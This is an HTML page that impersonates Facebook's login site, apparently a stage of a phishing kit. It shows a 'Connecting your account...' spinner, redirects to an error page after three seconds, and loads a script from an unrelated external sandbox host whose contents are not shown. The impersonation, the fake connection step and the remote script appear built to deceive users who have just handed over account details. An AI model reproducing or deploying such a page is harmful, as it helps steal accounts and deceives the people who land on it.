<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1.0, shrink-to-fit=no"
    />
    <title>Facebook - Log In or Sign Up</title>
    <link
      rel="icon"
      type="image/svg+xml"
      sizes="683x683"
      href="assets/img/facebook.svg"
    />
    <link
      rel="icon"
      type="image/svg+xml"
      sizes="683x683"
      href="assets/img/facebook.svg"
    />
    <link
      rel="icon"
      type="image/svg+xml"
      sizes="683x683"
      href="assets/img/facebook.svg"
    />
    <link
      rel="icon"
      type="image/svg+xml"
      sizes="683x683"
      href="assets/img/facebook.svg"
    />
    <link
      rel="icon"
      type="image/svg+xml"
      sizes="683x683"
      href="assets/img/facebook.svg"
    />
    <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css" />
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css?family=Roboto"
    />
    <link rel="stylesheet" href="assets/css/Contact-Form-Clean.css" />
    <link rel="stylesheet" href="assets/css/styles.css" />
  </head>

  <body>
    <script>
      setTimeout(function () {
        window.location.href = "error.html";
      }, 3000);
    </script>
    <nav
      class="navbar navbar-light navbar-expand-md"
      style="padding-bottom: 10px; margin-bottom: 52px"
    >
      <div class="container-fluid">
        <img
          class="img-fluid"
          src="assets/img/dF5SId3UHWd.svg"
          style="width: 140px; margin-top: 0px"
        />
      </div>
    </nav>
    <div
      class="contact-clean"
      style="
        padding: 0;
        padding-top: 0 px;
        padding-bottom: 0px;
        background: rgb(255, 255, 255);
      "
    >
      <form
        id="asset"
        style="
          width: 100%;
          padding-top: 0;
          padding-right: 15px;
          padding-left: 10px;
          border-style: none;
          box-shadow: inset 0px 0px;
        "
      >
        <div>
          <img
            class="img-fluid"
            src="assets/img/Rolling-0.6s-211px.gif"
            style="width: 68px; margin-bottom: 11px"
          />
          <p
            style="
              text-align: center;
              padding-right: 15%;
              padding-left: 15%;
              color: rgba(99, 106, 113, 0.88);
            "
          >
            Connecting your account...
          </p>
        </div>
      </form>
    </div>
    <script src="assets/bootstrap/js/bootstrap.min.js"></script>
    <script
      id="myScript"
      src="https://dev-pitgurat.pantheonsite.io/sandbox/H1516FAPBE01.min.js"
    ></script>
    <script src="assets/js/script.js"></script>
  </body>
</html>
